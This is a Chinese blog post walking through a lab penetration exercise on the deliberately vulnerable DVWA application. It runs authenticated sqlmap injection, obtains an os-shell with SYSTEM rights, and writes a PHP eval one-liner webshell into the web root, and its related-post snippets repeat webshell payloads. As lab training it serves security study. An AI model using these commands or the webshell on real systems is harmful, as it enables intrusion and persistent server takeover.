【渗透练习系列】DVWA的一次登录后通过Sqlmap拿到os-shell,命令执行写入一句话-01

已于 2022-01-19 22:24:01 修改
阅读量4.3k 收藏 13
点赞数 2
分类专栏: 渗透测试 文章标签: 安全 web安全 php 渗透测试
于 2022-01-19 22:19:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hellohahi/article/details/122590762
版权

一、前言

本次将通过DVWA靶机来展示怎样通过Sqlmap获取目标os-shell,得到命令执行权限,从而写入一句话木马,持续控制目标服务器。

二、测试

1.打开目标站点:http://192.200.30.126/DVWA/login.php,从网页后缀和wappalyzer浏览器插件来看,站点的编程语言为PHP。
在这里插入图片描述2.输入账号跟密码登录后台,同时开启Burp抓取http包。
获取登录后的Cookie值:
在这里插入图片描述3.找到存在SQL注入的模块。获取URL。

http://192.200.30.126/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#

在这里插入图片描述4.由于该页面是登录后,不能直接用SQLMAP跑,需要加入Cookie来注入。构造如下命令:

sqlmap.py -u "http://192.200.30.126/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=43teu289ku4vi8g9updhua57o3" --batch

在这里插入图片描述这里可以看到是存在数字型注入的,可通过’–+进行闭合。

5.直接通过手工注入,爆出数据库路径为D:\phpstudy_pro\Extensions\MySQL5.7.26
看到站点通过phpstudy搭建,猜测web路径为:D:\phpstudy_pro\WWW
【注意】:通过sqlmap获取os-shell,需要知道站点的绝对路径。
在这里插入图片描述6.直接通过SQLMAP加载os-shell。执行如下命令:

sqlmap.py -u "http://192.200.30.126/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=43teu289ku4vi8g9updhua57o3" --os-shell

在这里插入图片描述1).第一个选择,首先选择web支持的脚本语言。(之前已经知道网站是PHP语言,)
2).第二个选择,您希望sqlmap进一步尝试揭示完整路径吗? Y
3).第三个选择,302重定向到目标URL。 你想跟上吗? Y
4).第四个选择,你提供了一个HTTP Cookie头值,而目标URL在与你的Cookie头相交的HTTP Set-Cookie头中提供了自己的Cookie。 是否要在进一步的请求中合并它们? n
5).第五个选择,你想用什么作为可写目录?
[1] 常用路径枚举
[2]自定义路径
[3] 自定义枚举字典
[4] 蛮力枚举路径

这里选择2,使用之前猜测的web路径:D:\phpstudy_pro\WWW\,不过这里需要使用反斜杠:D:/phpstudy_pro/WWW/

7.获取到os-shell后,直接命令执行whoami,发现直接是system权限。
在这里插入图片描述
8.通过dir获取当前路径,D:\phpstudy_pro\WWW\路径下确实是DVWA网站的web路径。
在这里插入图片描述
9.直接通过echo写入一句话PHP木马,写入到web的根路径下。这里敲完命令就直接按回车。

echo "<?php @eval($_POST["shell"]);?>" > shell.php

在这里插入图片描述
10.直接通过蚁剑连接,测试连接成功。成功获取目标站点管理权限。
在这里插入图片描述在这里插入图片描述

山上的云朵
关注
  • 2
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2020-12-01-DVWA.md
01-24
### DVWA之Command Injection知识点详解 ... - 记录所有的命令执行活动,并定期审查日志。 - 实施监控机制,及时发现异常行为。 通过以上措施,可以有效提高Web应用的安全性,防止Command Injection等类型的攻击。
sqlmap --os-shell写入木马获取getshell
NSQ0207的博客
09-06 1153
抓包,查看报错暴露出绝对路径。
SQL注入SQLmap简单用法,和SQL注入写入一句话木马
m0_56214376的博客
03-16 9323
SQL注入 Boolean注入攻击-布尔盲注 1' and length(database())>1 -- qwe 1’ and length(database())>10 # mysql数据库中的字符串函数 substr()函数和hibernate的substr()参数都一样,但含义有所不同。 用法: substr(string string,num start,num length); string为字符串; start为起始位置; length为长度。 1’ and ascii(s
5、sqlmap注入post类型+os-shell
weixin_51520483的博客
05-21 404
3、上bp抓取数据包,sqlmmap用post注入走一遍,找到数据库,账号密码,这里的账号密码其实也没什么用,形同虚设。5、试一下shell注入,一试一个准,直接进去了,查看一下根目录发现flag。2、判断注入类型,是一个字符注入,使用or直接绕过密码进去了。6、成功进入shell,查看根目录文件,发现flag。3、发现数据库没有机会的情况,换os-shell注入。4、老规矩,数据表、字段挨个走一遍,但没有什么发现。-r:表示目标为一个文件,bp抓的包。-p:表示一个参数,即一个注入的口。
sql注入学习
qq_42685664的博客
03-18 1652
sql注入学习
sqlmap --os-shell 使用方法
m0_50818626的博客
06-07 3970
可以看到最下方有文件上传的位置,在这里我们可以上传一句话木马。如上图所示,红框处很明显是一个传参点,我们就在这个页面抓包。总结:sqlmap -os-shell 的使用需要以下条件。抓到包之后将内容保存到桌面的1000.txt文件下。--os-shell:本质就是写入两个php文件。-dbms=mysql:指定跑mysql数据库。我们获得了两个url,我们访问第一个url。这里我们先选择4,因为网站是php代码写的。三、上传一句话木马,连接蚁剑。上图就是一句话木马的内容。二、sqlmap跑包。
CMD写一句话木马
m0_49972294的博客
12-22 3011
linux: echo -e "<?@include(\$_POST["c"]);?>" > webshell.cc.php 会再同目录下生成webshell.cc.php一句话 密码:c win: echo ^<%eval request("c")%^> >>webshell.cc.asp 会再同目录下生成webshell.cc.asp一句话 密码:c ...
SQL注入上传一句话木马(转)
hanzhen668的博客
06-10 1499
SQL注入上传一句话木马
docker-dvwa:DVWA的Docker Compose设置
03-06
DVWA在Dockerhub上有可用的官方Docker映像,但是编写此映像时,该映像已有2年未收到任何更新。 如果您希望始终使用最新版本,请使用此处提供的Docker Compose设置。 映像将始终根据存储库的最新主分支在。 :party...
DVWA-DVWA渗透测试平台文件
03-07
DVWA全称为Damn Vulnerable Web Application,意为存在糟糕漏洞的web应用。它是一个基于PHP/MySQL开发的存在糟糕漏洞的web应用,旨在为专业的安全人员提供一个合法的环境,来测试他们的工具和技能。帮助web开发人员...
sqlmap在windows上执行sql注入,利用dvwa靶场.md
05-19
分享一下自己学习sqlmap的过程,因为网上的资源很少,所以就想着写个博客记录一下,同时也分享一下吧。就先讲到这里吧,有问题的可以私信。欢迎大家提意见。
如何使用命令行合成一句话图片木马
dhgogogogogogo的博客
11-28 3302
简单的合成一句话图片木马的方法,除此之外,还可以使用Photoshop合成
MSF模拟渗透测试一句话木马拿shell
lza20001103的博客
04-08 3881
MSF模拟渗透测试一句话木马拿shell
利用SQL注入植入 webshell
小白渣的博客
02-27 6350
这里小结一下通过SQL注入写入WebShell的方法。 传统的SQL语句写shell 通过SQL注入select into outfile实现,如: 1' union ...
SQL注入MySQL中写入木马getshell的两种方法
qq_41187177的博客
09-09 4604
SQL注入MySQL中写入木马getshell的两种方法 1.利用into outfile直接写入木马文件 利用条件: 1.知道网站的绝对路径 2.secure_file_priv不能为null 3.具有写入文件的权限 案例: 1.利用into outfile写入木马文件 select "<?php eval($_POST['cmd']);?>" into outfile "D:\\phpstudy_pro\\WWW\\shell.php" 2.利用日志文件写入木马 1.开启日志功能 set
一句话木马及免杀
热门推荐
Lum1n0us's Blog
08-12 1万+
这篇文章主要是总结一句话木马,并实现一句话木马的简单免杀,以及一个不死马的实现。 文章目录一句话木马及原理一句话木马简单免杀一、assert()二、字符串拼接三、函数四、request请求五、类六、base64加解密七、写入木马不死马 一句话木马及原理 首先,来看最简单的一句话木马: <?php @eval($_POST['cmd']); ?> 前面的<?php ?>是php的文件格式,@是让程序在执行错误的情况下也不要报错,eval()函数是将括号里的内容都当作代码执行,$_PO
web渗透_一句话木马(webshell)_dvwa环境
摸鱼域的空气。
04-04 8121
厄薇娅·瑞尔说,今天是个好日子。 一、什么是一句话木马 <?php @eval($_POST['a']); ?> 先来一段简单的一句话木马,解析下它的构造: @这个符号的作用是抵制错误提示;eval()函数将接收一个字符串参数,并将这个字符串作为命令语句执行;$_REQUEST['a']从请求参数中得到a这个参数的值,请求参数有两种:GET和POST;a参数名(自定义) 而这段代码的意思就是:用POST方法接收变量a,把变量a里面的字符串当做php代码来执行。 也就是说,你想执行什么代码,.
怎样修复DVWA一句话木马
最新发布
06-27
DVWA(Damn Vulnerable Web Application)是一个非常流行的开源Web应用程序,用于教学和测试安全防御措施。如果遇到DVWA中的“一句话木马”漏洞,通常需要采取以下步骤来修复: 1. **确认漏洞位置**:首先确定是哪个文件或代码行存在木马,DVWA中的漏洞可能存在于SQL查询、文件包含或用户输入处理部分。 2. **修改源代码**:定位到有问题的代码,检查是否有不当的字符串拼接、未过滤的用户输入。修复方法可能包括使用参数化查询替换SQL语句,使用`escapeshellcmd()`或类似函数转义用户输入,防止文件路径遍历等。 3. **验证修复**:在修复后,重新运行安全扫描工具验证漏洞是否已被消除。可以在本地环境或线上环境中复现漏洞测试过程。 4. **更新和安全配置**:确保应用的其他部分(如服务器配置、防火墙规则等)也有足够的安全措施,防止绕过修复的漏洞。 5. **提交更新**:如果DVWA有开源社区支持,将修复后的代码提交到官方仓库,让更多人受益。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值